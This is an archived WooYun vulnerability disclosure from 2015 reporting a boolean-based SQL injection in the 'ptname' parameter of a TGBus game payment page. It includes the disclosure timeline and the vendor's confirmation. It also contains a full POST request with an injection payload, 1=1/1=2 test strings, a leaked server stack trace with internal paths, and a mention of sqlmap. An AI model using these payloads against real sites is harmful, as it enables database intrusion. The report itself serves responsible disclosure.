乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-05-06: 细节已通知厂商并且等待厂商处理中 2015-05-06: 厂商已经确认,细节仅向厂商公开 2015-05-16: 细节向核心白帽子及相关领域专家公开 2015-05-26: 细节向普通白帽子公开 2015-06-05: 细节向实习白帽子公开 2015-06-20: 细节向公众公开
电玩巴士某BOOL型注入漏洞(有长度限制)
post数据
ctl00%24ContentPlaceHolder%24btn_edit=%c1%a2%bc%b4%b3%e4%d6%b5&ctl00%24ContentPlaceHolder%24droGameApp=107&ctl00%24ContentPlaceHolder%24package=15&ctl00%24ContentPlaceHolder%24ptname=admin' and lower(ascii(substring(db_name(),2,1)))<126--&ctl00%24ContentPlaceHolder%24ptname1=rpycaykj&__VIEWSTATE=/wEPDwUJOTk3MTgzMzA0D2QWAmYPZBYCAgkPZBYCAgMPZBYIZg8WAh4JaW5uZXJodG1sBQ/lroznvo7kuIDljaHpgJpkAgEPFgIfAAUM5pS75Z%2bO5o6g5ZywZAICDxAPFgYeDURhdGFUZXh0RmllbGQFB0FwcE5hbWUeDkRhdGFWYWx1ZUZpZWxkBQJJRB4LXyFEYXRhQm91bmRnZBAVAg9TMiDnvqTpm4TpgJDpub8PUzEg5qGD5Zut57uT5LmJFQIDMTA3AzEwNRQrAwJnZ2RkAgcPEGQPFgRmAgECAgIDFgQQBQIxNQUCMTVnEAUCMzAFAjMwZxAFAjUwBQI1MGcQBQMxMDAFAzEwMGdkZGTmxthQ5sMzLHfV%2b9v2/pS3VumxZA%3d%3d
到http://pay.tgbus.com/payment/payinfo.aspx?gameid=71&id=21时ptname 存在注入漏洞ptname=admin' and 1=1--ptname=admin' and 1=2--返回不同页面这里ptname必须要填一个存在的用户 才能构成BOOL型注入否则就是时间注入了。另外直接加' 暴物理路径
[SiteException: 引发类型为“Feixue.White.Framework.SiteException”的异常。] Feixue.White.DataProvider.DataEngin.Execute(String module, String sql, ExcuteMode excuteMode) in D:\公司项目\TGBus_white\Feixue.White\Feixue.White.DataProvider\DataEngin.cs:141 Feixue.White.DataProvider.DataEngin.Execute(String module, String sql) in D:\公司项目\TGBus_white\Feixue.White\Feixue.White.DataProvider\DataEngin.cs:83 Feixue.White.UserProvider.UserEngin.Get(String username, Boolean isPostUC) in D:\公司项目\TGBus_white\Feixue.White\Feixue.White.UserProvider\UserEngin.cs:515 Feixue.White.UserProvider.UserEngin.Get(String username) in D:\公司项目\TGBus_white\Feixue.White\Feixue.White.UserProvider\UserEngin.cs:503 Feixue.White.UserProvider.UserEngin.GetByUCUID(String username) in D:\公司项目\TGBus_white\Feixue.White\Feixue.White.UserProvider\UserEngin.cs:555 Feixue.White.Ucenter.WebSite.payment.PayInfo.btn_pay_Click(Object sender, EventArgs e) in D:\公司项目\TGBus_white\Feixue.White\Feixue.White.Ucenter.WebSite\payment\PayInfo.aspx.cs:8
用sqlmap猜解当前用户:
不再深入。
参数加以过滤
危害等级:高
漏洞Rank:15
确认时间:2015-05-06 13:33
感谢洞主对完美世界的关注,我们将尽快修补该漏洞。
暂无